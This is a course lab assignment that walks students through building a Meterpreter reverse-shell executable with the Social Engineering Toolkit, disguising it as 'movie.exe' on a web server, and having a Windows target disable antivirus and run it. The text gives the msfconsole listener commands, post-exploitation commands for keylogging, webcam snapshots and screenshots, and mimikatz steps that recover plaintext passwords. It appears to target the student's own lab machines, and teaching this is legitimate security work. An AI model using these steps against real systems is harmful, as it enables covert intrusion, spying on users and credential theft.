CNIT 123 Proj 4: Creating Infectious Media with the Social Engineering Toolkit (15 pts.)

What You Need

Purpose

We will use Kali Linux and the Social Engineering Toolkit to create an infectious EXE file.

A user who runs that file.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 192.168.119.169.

Launch the Social Engineering Toolkit

From the Kali desktop, at the top left, click Applications, "Exploitation Tools", "social engineering toolkit".

If this is the first time you have run it, you will need to agree to the Terms of Service.

The Social-Engineer Toolkit opens, as shown below:

If you see a message saying "Press [enter] to accept that SET is several months out of date and probably contains bugs and issues.", press Enter. If you see a message saying "Do you agree to the terms of service [y/n]: ", type y and press Enter.

Creating Infectious Media

Now select these options from the menus (note that the numbers may change as the toolkit is updated):

As shown below, this message appears: "Payload has been exported to the default SET directory".

When you see the question: "Create a listener right now [yes|no]:", type yes and press Enter.

Troubleshooting

Sometimes SET fails and doesn't open the listener. If that happens, execute these commands to open a listener manually:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 5555
exploit

Delivering the Payload to the Windows Target

In Kali, open a new Terminal window and execute these commands. The first command puts the malicious file in the default directory for Apache, with a friendly-looking name, and the second one starts the Apache web server.
cp ~/.set/payload.exe /var/www/html/movie.exe

service apache2 start

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
http://192.168.119.130/movie.exe
The file "movie.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

Exploiting the Target

On the Kali Linux machine, you should see a "Meterpreter session 1 opened" message, as shown below.

Saving the Screen Image

Make sure the "Meterpreter session 1 opened" message is visible, as shown above.

Click on the host computer's desktop to make it active. Press the PrntScrn key to capture the whole screen.

YOU MUST SUBMIT WHOLE DESKTOP IMAGES FOR FULL CREDIT.

Save this image as a PNG file, named "Proj 4a from YOUR NAME"

Opening an Interactive Meterpreter Session

On your Kali machine, execute this command:
sessions -i 1
You should see the meterpreter > prompt, as shown below.

Post-Exploitation

You now own the target! Here are some fun meterpreter > commands to try:

screenshot: Gives you an image of the target's desktop
keyscan_start: Begins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dump: Shows the keystrokes captured so far
webcam_list: Shows the available webcams (if any)
webcam_snap: Takes a photo with the webcam
shell: Gives you a Windows Command Prompt on the target
exit: Leaves the Windows Command Prompt

Stealing a Password

On the Kali Linux machine, in an open Meterpreter session, execute these commands:

load mimikatz

kerberos

The current user's password appears in plaintext, as shown below.

Saving the Screen Image

Make sure the plaintext password of P@ssw0rd is visible, as shown above.

Click on the host computer's desktop to make it active. Press the PrntScrn key to capture the whole screen.

YOU MUST SUBMIT WHOLE DESKTOP IMAGES FOR FULL CREDIT.

Save this image as a PNG file, named "Proj 4b from YOUR NAME"

Turning in Your Project

Email the images to cnit.123@gmail.com with a subject of "Proj 4 from YOUR NAME".

Last modified 9-23-16